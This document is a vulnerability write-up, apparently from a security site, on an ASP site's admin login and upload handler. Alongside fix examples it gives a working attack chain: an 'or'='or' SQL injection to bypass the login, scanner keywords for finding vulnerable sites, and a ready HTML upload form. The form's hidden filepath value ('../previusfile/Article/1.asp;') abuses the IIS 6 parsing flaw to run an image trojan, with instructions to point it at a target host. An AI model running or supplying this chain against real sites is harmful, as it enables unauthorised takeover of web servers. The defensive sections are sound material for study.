Author: shangjian
Release date:
Vulnerability Type: File Upload
Vulnerability file: gd_ChkLogin.asp
Vulnerability description:
Some of the relevant code is pasted below for analysis.
<%
Dim user1, pass1, rs, SQL
user1 = Trim(Request("textfield"))    ' get the submitted user name and assign it to user1
pass1 = Trim(Request("textfield2"))   ' get the submitted password and assign it to pass1
' no filtering is performed here
If user1 = "" Then
    FoundErr = True
    ErrMsg = ErrMsg & "<br><li>The user name cannot be blank!</li>"
End If
If pass1 = "" Then
    FoundErr = True
    ErrMsg = ErrMsg & "<br><li>The password cannot be blank!</li>"
End If
If Not IsNumeric(Request.Form("passcode")) Then
    FoundErr = True
    ErrMsg = ErrMsg & "<br><li>The verification code must be a number. Please enter it correctly!</li>"
ElseIf Session("GetCode") <> CInt(Request.Form("passcode")) Then
    FoundErr = True
    ErrMsg = ErrMsg & "<br><li>The verification code is incorrect. Please enter it correctly!</li>"
End If
If FoundErr = True Then
    Call WriteErrMsg()
Else
    Set rs = Server.CreateObject("ADODB.Recordset")
    SQL = "select * from admin_door where admin_user='" & user1 & "' and admin_pass='" & md5(pass1) & "'"
    ' the values of user1 and pass1 are concatenated straight into the query statement
    rs.Open SQL, conn, 1, 1
    If rs.BOF And rs.EOF Then
        FoundErr = True
        ErrMsg = ErrMsg & "<br><li>The user name or password is incorrect!</li>"
        Call WriteErrMsg()
    Else
        SessionTimeout = 40
        Session.Timeout = SessionTimeout
        Session("admin_name") = rs("admin_user")
        Session("admin_quanxian") = rs("admin_quanxian")   ' administrator permission level
        Session("adminname") = rs("admin_user")
        Response.Redirect "default.asp"
    End If
    rs.Close
    Set rs = Nothing
End If
%>
user1 and pass1 are never filtered, so the admin backend login can be bypassed with the classic 'or'='or' injection: the string concatenation above turns the submitted values into part of the SQL WHERE clause.
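For comparison, the same lookup written with a parameterised ADODB.Command, so that whatever is typed into user1 and pass1 is passed as data and can never change the SQL statement. This is an added example, not code from the vulnerable application; it assumes the same conn connection object, admin_door table, md5() helper and FoundErr/ErrMsg globals as the code above, and a database driver that accepts ? placeholders through ADO (Jet/Access and SQL Server both do).

```asp
<%
' Added example (not the original page's code): parameterised login lookup.
' Assumes conn, admin_door, md5(), FoundErr and ErrMsg exist as in the code above.
Dim cmd, rs, user1, pass1
user1 = Trim(Request.Form("textfield"))
pass1 = Trim(Request.Form("textfield2"))

Set cmd = Server.CreateObject("ADODB.Command")
Set cmd.ActiveConnection = conn
cmd.CommandType = 1      ' adCmdText: the text below is the complete statement
' Only the columns that are actually used are selected; the ? markers are bound below,
' so quotes or keywords inside user1/pass1 are compared literally, never interpreted.
cmd.CommandText = "SELECT admin_user, admin_quanxian FROM admin_door " & _
                  "WHERE admin_user = ? AND admin_pass = ?"
' CreateParameter(Name, Type, Direction, Size, Value): adVarChar = 200, adParamInput = 1
cmd.Parameters.Append cmd.CreateParameter("user", 200, 1, 50, user1)
cmd.Parameters.Append cmd.CreateParameter("pass", 200, 1, 32, md5(pass1))
Set rs = cmd.Execute

If rs.BOF And rs.EOF Then
    ' One generic message for both "unknown user" and "wrong password",
    ' so the response does not reveal which half failed.
    FoundErr = True
    ErrMsg = ErrMsg & "<br><li>The user name or password is incorrect!</li>"
Else
    Session("admin_name") = rs("admin_user")
    Session("admin_quanxian") = rs("admin_quanxian")
End If

rs.Close
Set rs = Nothing
Set cmd = Nothing
%>
```

With the parameters bound this way, submitting 'or'='or' in either field simply looks for an account whose name or password hash is that literal string, and the BOF/EOF branch rejects the login.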
Backend address: /backdoor/gd_login.asp
Vulnerability exploitation:
Add /backdoor/gd_login.asp to the "excavator" scanner.
Keywords: Home Assembly Network (good keywords have to be found by searching yourself).
Use 'or'='or' to enter the backend. Save the following code as canjian.html:
<html>
<head>
<title>Upload images</title>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<style type="text/css">
<!--
td {font-size: 12px}
a {color: #000000; text-decoration: none}
a:hover {text-decoration: underline}
.tx {height: 16px; width: 30px; border-color: black #000000; border-top-width: 0px; border-right-width: 0px; border-bottom-width: 1px; border-left-width: 0px; font-size: 12px; background-color: #eeeeee; color: #0000FF}
.button {font-size: 12px; border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; height: 16px; width: 80px; background-color: #eeeeee; cursor: hand}
.tx1 {height: 20px; width: 30px; font-size: 12px; border: 1px solid; border-color: black #000000; color: #0000FF}
-->
</style>
<script language="javascript">
<!--
function mysub()
{
  esave.style.visibility = "visible";
}
-->
</script>
</head>
<body bgcolor="#FFFFFF" text="#000000">
<form name="form1" method="post" action="http://www.xxx.com/backdoor/upload_asp.asp" enctype="multipart/form-data">
<div id="esave" style="position: absolute; top: 18px; left: 40px; z-index: 10; visibility: hidden">
<table width=340 border=0 cellspacing=0 cellpadding=0>
<tr><td width=20%></td>
<td bgcolor="# define a7b" width="60%">
<table width=100% height=120 border=0 cellspacing=1 cellpadding=0>
<tr>
<td bgcolor=#eeeeee align=center><font color=red>Uploading files. Please wait...</font></td>
</tr>
</table>
</td><td width=20%></td>
</tr></table></div>
<table width="400" border="0" cellspacing="1" cellpadding="0" align="center" bgcolor="#D5D5D5">
<tr>
<td height="22" align="left" valign="middle" width="400">Upload images
<input type="hidden" name="filepath" value="../previusfile/Article/1.asp;">
<input type="hidden" name="filelx" value="jpg">
<input type="hidden" name="EditName" value="headpic">
<input type="hidden" name="FormName" value="myform">
<input type="hidden" name="act" value="previusfile">
</td>
</tr>
<tr align="center" valign="middle" bgcolor="#FFFFFF">
<td align="left" id="upid" height="80" width="400">Select a file:
<input type="file" name="file1" style="width: 300" class="tx1" value="">
</td>
</tr>
<tr align="center" valign="middle">
<td height="24" width="400">
<input type="submit" name="Submit" value="Upload" class="button" onClick="javascript: mysub()">
</td>
</tr>
</table>
</form>
</body>
</html>
Then upload the image Trojan directly.
In the form's action, http://www.xxx.com/backdoor/upload_asp.asp, replace www.xxx.com with the address of the target website.
The upload then relies on the IIS parsing vulnerability to get the file executed, which gives control of the website.
Fix suggested by www.2cto.com: filter user1 and pass1, and upgrade IIS to version 7.
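The upload half of this issue comes from the handler trusting the hidden filepath field (which here carries a directory traversal and a "1.asp;" prefix that IIS 6 parses as ASP) and the client's file name. The following added example, not part of the page or of the vulnerable product, shows the server-side naming rule a fixed upload_asp.asp would apply instead: the directory is fixed on the server, the base name is generated, the extension is whitelisted, and any character that could change how the path is parsed is rejected. It assumes the multipart body has already been parsed and the original file name is available in a hypothetical variable clientName.

```asp
<%
' Added example (not the original page's code): server-side naming for uploaded images.
' Everything from the client (the hidden "filepath" field and the original file name)
' is treated as untrusted. Returns "" when the upload must be rejected.
Function SafeUploadName(clientName)
    Dim ext, pos, allowed, i, base
    SafeUploadName = ""
    allowed = Array("jpg", "jpeg", "gif", "png")

    ' Reject characters that could alter path parsing or file type on IIS 6:
    ' ";" and "/" (parsing vulnerability), "\" and ".." (traversal), "%" and NUL.
    If InStr(clientName, ";") > 0 Or InStr(clientName, "/") > 0 Or InStr(clientName, "\") > 0 _
       Or InStr(clientName, "..") > 0 Or InStr(clientName, "%") > 0 _
       Or InStr(clientName, Chr(0)) > 0 Then Exit Function

    ' The extension is whatever follows the LAST dot, so "shell.jpg.asp" yields "asp"
    ' and is refused; "1.asp;.jpg" never gets this far because of the ";" check.
    pos = InStrRev(clientName, ".")
    If pos = 0 Then Exit Function
    ext = LCase(Mid(clientName, pos + 1))

    For i = 0 To UBound(allowed)
        If ext = allowed(i) Then
            ' Server-generated base name (timestamp plus random suffix); the client's
            ' name and the client's "filepath" value are never used for the target path.
            Randomize
            base = Year(Now) & Right("0" & Month(Now), 2) & Right("0" & Day(Now), 2) & _
                   Right("0" & Hour(Now), 2) & Right("0" & Minute(Now), 2) & _
                   Right("0" & Second(Now), 2) & "_" & Int(Rnd * 10000)
            SafeUploadName = "/previusfile/Article/" & base & "." & ext
            Exit Function
        End If
    Next
End Function

' Usage inside the fixed handler (clientName is hypothetical, as described above):
' target = SafeUploadName(clientName)
' If target = "" Then reject the request, Else write the file to Server.MapPath(target)
%>
```

The extension whitelist alone is not sufficient on IIS 6, which is why the ";" and "/" checks are there; in addition, the /previusfile/ directory should be configured in IIS with script execution permissions removed, so that even a file that slips through is served as static content rather than run as ASP.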